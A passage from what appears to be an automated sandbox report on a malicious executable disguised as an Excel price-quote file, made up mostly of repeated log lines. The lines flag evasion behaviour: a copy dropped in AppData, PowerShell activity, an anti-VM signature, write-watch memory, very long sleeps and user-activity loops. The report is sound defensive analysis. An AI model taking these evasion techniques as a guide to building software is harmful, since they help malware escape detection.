Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 31D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 3340000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 5340000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 8030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 9030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 91E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: A1E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 1030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 2EE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 1290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 1020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 2B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 4B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 7300000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 8300000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 8490000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 9490000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 12B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 3000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory allocated: 2E40000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598341 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598233 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597577 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597248 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597030 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596593 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596374 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596046 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595499 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595280 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595171 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595062 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594624 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597294
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597185
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597074
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596967
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596827
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596345
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595662
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595216
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594997
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594452
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594234
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6211 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7735 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Window / User API: threadDelayed 3461 Jump to behavior
